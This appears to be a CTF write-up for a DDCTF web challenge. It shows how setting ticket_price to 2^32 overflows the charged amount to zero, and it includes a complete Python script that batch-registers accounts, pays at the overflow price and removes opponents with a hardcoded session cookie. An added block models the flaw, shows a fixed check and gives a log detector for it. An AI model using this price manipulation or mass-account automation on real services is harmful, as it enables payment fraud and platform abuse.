url: http://117.51.147.15:5050/index.html
Opening the URL shows a login page. Viewing the source turns up nothing, so I registered an account first. After registering, it jumps straight to the balance / ticket-purchase page. While there I also had a look at the request headers in F12: there is a cookie, which will be needed later, so I'll leave it for now.
Then we click "Buy Now"; if you watch closely you can see a request being sent: GET /ctf/api/buy_ticket?ticket_price=2000 HTTP/1.1
The ticket is added to the order list. Clicking Pay gives an obvious "insufficient balance". Going back to that request and changing the value of ticket_price to 100 produces the message that the ticket price is 2000, so smaller values are rejected; raising it to 123456789, however, is accepted. That naturally suggests a large-number overflow. After a round of fuzzing, the value overflows to 0 at roughly 2^32; modifying the request accordingly, the payment succeeds.
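The following is an added example, not part of the original write-up or the challenge's code: it models the price check as observed (a lower bound enforced on the full integer, then an assumed narrowing to unsigned 32 bits that turns 2^32 into 0), puts a corrected check beside it, and shows a log-side detector for buy_ticket requests whose ticket_price is not the canonical 2000. The function names and the uint32 narrowing are assumptions; the server's real implementation is not public.

```python
from urllib.parse import urlsplit, parse_qs

TICKET_PRICE = 2000          # the only legitimate price the challenge page sells
UINT32_MAX = 2**32 - 1

def vulnerable_charge(balance: int, requested_price: int) -> int:
    """Model of the observed behaviour (assumed; the real server code is not public):
    the lower bound is checked on the full integer, but the amount actually charged
    is narrowed to an unsigned 32-bit value, so 2**32 wraps to 0."""
    if requested_price < TICKET_PRICE:
        raise ValueError("ticket price is 2000")
    charged = requested_price & UINT32_MAX   # the narrowing conversion that causes the bug
    if charged > balance:
        raise ValueError("insufficient balance")
    return balance - charged

def hardened_charge(balance: int, requested_price: int) -> int:
    """Fixed version: range-check before any narrowing, and never let the client
    set the price; the parameter is only compared against the server-side value."""
    if not 0 <= requested_price <= UINT32_MAX:
        raise ValueError("ticket_price out of range")
    if requested_price != TICKET_PRICE:
        raise ValueError("ticket price is 2000")
    if TICKET_PRICE > balance:
        raise ValueError("insufficient balance")
    return balance - TICKET_PRICE

def suspicious_ticket_price(request_line: str) -> bool:
    """Detection helper for access logs: flag any buy_ticket request whose
    ticket_price is missing, non-numeric, or not the canonical price."""
    path = request_line.split()[1] if " " in request_line else request_line
    parts = urlsplit(path)
    if not parts.path.endswith("/buy_ticket"):
        return False
    values = parse_qs(parts.query).get("ticket_price", [])
    if not values:
        return True
    for raw in values:
        try:
            if int(raw) != TICKET_PRICE:
                return True
        except ValueError:
            return True
    return False

if __name__ == "__main__":
    # constructed sample request lines, in the format quoted in the write-up
    for line in ["GET /ctf/api/buy_ticket?ticket_price=2000 HTTP/1.1",
                 "GET /ctf/api/buy_ticket?ticket_price=4294967296 HTTP/1.1"]:
        print(line, "->", "suspicious" if suspicious_ticket_price(line) else "ok")
    print(vulnerable_charge(0, 2**32))   # 0: the wrap lets a zero-balance account pay
```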
Two parameters appear, id and ticket. Clicking "Remove opponent" also asks for an id and a ticket; entering my own gives "cannot remove yourself". Registering another account in a different browser, taking its id and ticket and trying them, the opponent count dropped by one. So the logic is clear: batch-register accounts and remove opponents; by battle-royale logic, eliminate every opponent and you get the chicken dinner. The fewer players remain, the harder it is to remove an opponent, so this ran for quite a while.
Script attached:
# coding:utf-8
import requests

# browser-like headers sent with every request
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"
}

def removeBot(id, ticket):
    # remove the opponent (id, ticket) using my own account's session cookie
    url = "http://117.51.147.155:5050/ctf/api/remove_robot?id=" + str(id) + "&ticket=" + str(ticket)
    headers = dict(HEADERS)
    headers["Cookie"] = "user_name=ivenwings1; REVEL_SESSION=4d9c64ceae23ec51677544513a258841"
    tmp = requests.get(url=url, headers=headers)
    if '200' in tmp.text:
        print("remove ID %s success!" % id)

def login(i):
    # log the throwaway account in and return its session cookie as a header dict
    url = "http://117.51.147.155:5050/ctf/api/login?name=Robot-%s&password=12345678" % str(i)
    tmp = requests.get(url=url, headers=HEADERS)
    if '200' in tmp.text:
        print("login!")
        return {"Cookie": str(tmp.headers['Set-cookie'].replace(" Path=/, ", "").replace("; Path=/", ""))}

def buyticket(cookie):
    # buy with ticket_price=2^32, which overflows to 0, then pay the bill
    url = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
    tmp = requests.get(url, headers=cookie)
    # print(tmp.json())
    bill_id = tmp.json()['data'][0]['bill_id']
    url_bill = "http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=%s" % bill_id
    tmp2 = requests.get(url_bill, headers=cookie)
    tmp3 = tmp2.json()['data'][0]
    # the paid account's id and ticket are what remove_robot needs
    return str(tmp3['your_id']), tmp3['your_ticket']

def main():
    # register 500 throwaway accounts and remove each one as an opponent
    for i in range(500):
        url = "http://117.51.147.155:5050/ctf/api/register?name=Robot-%s&password=12345678" % str(i)
        tmp = requests.get(url=url, headers=HEADERS)
        print(tmp.text)
        if '200' in tmp.text:
            print("Registered!")
            cookie = login(i)
            print(cookie)
            id, ticket = buyticket(cookie)
            print("id:" + str(id) + " ticket:" + str(ticket))
            removeBot(id, ticket)

main()
Wait patiently:
We get the flag: DDCTF{chiken_dinner_hyMCX[n47Fx)}
Key points:
1. Large-number (integer) overflow
2. Batch registration